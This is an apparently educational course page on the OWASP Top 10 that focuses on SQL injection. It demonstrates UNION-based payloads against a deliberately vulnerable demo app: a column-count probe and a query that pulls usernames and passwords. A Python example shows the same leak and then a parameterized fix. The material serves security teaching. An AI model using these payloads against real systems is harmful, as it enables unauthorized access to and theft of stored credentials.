OWASP Top 10

Many organizations still struggle to build secure applications because they lack awareness of how to implement security controls effectively. OWASP (the Open Web Application Security Project) helps organizations address this.

About OWASP

  • A non-profit worldwide charitable organization
  • Focuses on improving the security of software applications
  • Educates designers, developers, and business owners on various risks commonly associated with Web applications

OWASP Top-10 and Its Versions


OWASP Top-10 is an awareness document, listing the Top-10 vulnerabilities found in web applications. It was first developed in 2003 with subsequent releases in 2004, 2007, 2010, 2013, and 2017.

OWASP's main aim is to make application security guidelines easily available to all, so that developers and organizations can make correct decisions about application security risks. Everyone is free to participate in OWASP, and all of its material is available under a free and open software license.

To better understand the vulnerabilities listed by OWASP, let us go through the Top-10 vulnerabilities suggested in the 2017 release.

Note: In this course, we are covering the OWASP Top 10 Vulnerabilities, 2017 release.

Approximately 85% of successful exploits are due to the Top-10 known vulnerabilities. The goal of the Top-10 project is to raise awareness about application security by identifying some of the most critical vulnerabilities in web applications. The ordering is based on the risk and prevalence of the vulnerabilities: severity and prevalence decrease down the list, with A1 being the most severe vulnerability and A10 the least severe on a scale of 1 to 10.

The image lists the OWASP Top 10 Vulnerabilities - Injection, Broken Authentication and Session Management, Sensitive Data Exposure, XML External Entity, Broken Access Control, Security Misconfiguration, Cross-Site Scripting, Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging and Monitoring. OWASP encourages organizations to follow the guidelines while developing a web application and encourages developers to learn from the mistakes of other organizations.

The list belongs to the OWASP Top-10 2017 release. Let us understand the first vulnerability A1: Injection.

A1: Injection


Understanding Injection

Injection is about supplying untrusted input to a program, which gets processed by an interpreter as part of a command or query, hence altering the course of execution of that program. Code that the interpreter processes is a mix of instructions written by the programmer and the data supplied by the user.

Injection attacks are among the oldest and most dangerous application attacks. They can result in data theft, data loss, loss of data integrity, denial of service, as well as full system compromise. Interpreted languages through which injection is possible include SQL, LDAP, XML, Perl, PHP, etc.


Types of Injections

  • SQL Injection
  • XML Injection
  • LDAP Injection
  • SOAP Injection
  • HQL Injection
  • OS Command Injection
  • XQuery Injection
  • XPath Injection

Note: In this course, we will only cover SQL injection in detail.

SQL Injection

SQL Injection refers to an injection attack where an attacker can execute malicious SQL statements that can access a web application's database server.

Attack Motive

  • To gain access to the database
  • To delete/corrupt the data
  • To cause denial of data access
  • To take over the complete host (Operating System)

Procedure of the Attack

  • The hacker sends specially framed input with SQL statements embedded, altering the semantics of the query.
  • The untrusted/unvalidated data is passed by the program to the interpreter as part of the query.
  • The interpreter is fooled, and the hacker succeeds in making the server run unintended queries.

A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system, and in some cases issue commands to the operating system.

SQL Injection - Demo

Explore the Existing Search Functionality of WeakApp Application

For this demo, we will use the WeakApp application, which has a search feature named 'Display records' that displays the user ID and the email ID of the users whose names have the given search character/string.

Step 1: Accessing the Feature

Click on the link – “Display Records: SQL Injection”. 

Below is a snapshot of the UI for Display records:


Step 2: Let us use the search functionality to display the user id and email id of the users who have character ‘v’ in their user id.

Search String: v

Output:

The backend SQL code for this search functionality is as follows:

SELECT userid, email FROM userAccounts WHERE userid LIKE '%v%';

The SQL query is built by concatenating the search string directly into the SQL text with the string concatenation operator, which is what makes the code vulnerable to SQL Injection.

Step 3: Hacking the Application

Let us try to hack the application to reveal the usernames and passwords of all the users of the WeakApp application.

Search String:

' union select null --

This payload deliberately has a space after the ' so that the quote closes the LIKE pattern and the rest is parsed as SQL.

Original Query:

SELECT userid, email FROM userAccounts WHERE userid LIKE '%" + matchText + "%';

Formed Query:

SELECT userid, email FROM userAccounts WHERE userid LIKE '%' union select null -- %';

The first SELECT now matches every user (LIKE '%'), and the UNION attempts to append a row containing null to that result.

Everything written after the -- symbol is treated as a comment, so the trailing %' of the original query is ignored.

The UNION fails, however, because the two SELECT statements return a different number of columns, and the application surfaces the raw database error:

HTTP Status 500 - java.sql.SQLException: The used SELECT statements have a different number of columns

Let us now find the right number of columns in the table and type of data each column can hold.

Finding the Number of Columns

Try injecting the following:

' union select 1, 2 --

Original Query:

SELECT userid, email FROM userAccounts WHERE userid LIKE '%" + matchText + "%';

Formed Query:

SELECT userid, email FROM userAccounts WHERE userid LIKE '%' union select 1, 2 -- %';

If the application accepts the input and runs the query successfully, then it means that the table userAccounts has only 2 columns.

Since the above query runs successfully, we can confirm that there are 2 columns in the table userAccounts.

The output (snapshot of SQL Injection: Display Records) shows the fields userID and emailID holding the values 1 and 2 respectively.

Now, let us try the next SQL Injection to fetch the username and password data of the users.

Fetching Username and Password

Try injecting the following:

' union select username, password from userAccounts --

Formed Query:

SELECT userid, email FROM userAccounts WHERE userid LIKE '%' union select username, password from userAccounts -- %';

The output shows the user ID and email ID fields showing the username and password respectively.

Below is a snapshot of SQL Injection: Display Records with the input text ' union select username, password from userAccounts --
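To see why the concatenated query is exploitable and what the fix looks like, here is an added example (not WeakApp's own code) that rebuilds the search against a constructed in-memory SQLite table, runs it once with the concatenation pattern from the demo and once with a bound parameter, and shows that the same UNION input is harmless in the parameterized version. The table name and columns mirror the demo; the row data is made up.

```python
import sqlite3

# Constructed sample data standing in for WeakApp's userAccounts table.
SAMPLE_ROWS = [
    ("bob", "bob@example.com", "bob", "s3cret"),
    ("vicky", "vicky@example.com", "vicky", "hunter2"),
    ("carol", "carol@example.com", "carol", "letmein"),
]

# The same search string the demo used to pull username and password.
UNION_PAYLOAD = "' union select username, password from userAccounts --"


def make_db():
    """Create an in-memory SQLite database with a userAccounts table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE userAccounts (userid TEXT, email TEXT, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO userAccounts VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, match_text):
    """Mirrors WeakApp: the search string is pasted into the SQL text, so the
    database parses it as SQL, not as data."""
    query = "SELECT userid, email FROM userAccounts WHERE userid LIKE '%" + match_text + "%'"
    return conn.execute(query).fetchall()


def search_safe(conn, match_text):
    """Hardened form: the pattern is bound as a parameter. Whatever the user
    types is compared as a string value; it can never close the quote or add
    a UNION. (% and _ are still LIKE wildcards; escape them if exact matching
    on those characters matters.)"""
    query = "SELECT userid, email FROM userAccounts WHERE userid LIKE ?"
    return conn.execute(query, ("%" + match_text + "%",)).fetchall()


def leaked_credentials(conn):
    """Return the (username, password) pairs the UNION payload exposes
    through the vulnerable search, i.e. rows that are not (userid, email)."""
    rows = search_vulnerable(conn, UNION_PAYLOAD)
    known = {(userid, email) for userid, email, _, _ in SAMPLE_ROWS}
    return [row for row in rows if row not in known]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", leaked_credentials(db))   # credentials leak
    print("parameterized, payload:", search_safe(db, UNION_PAYLOAD))  # []
```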

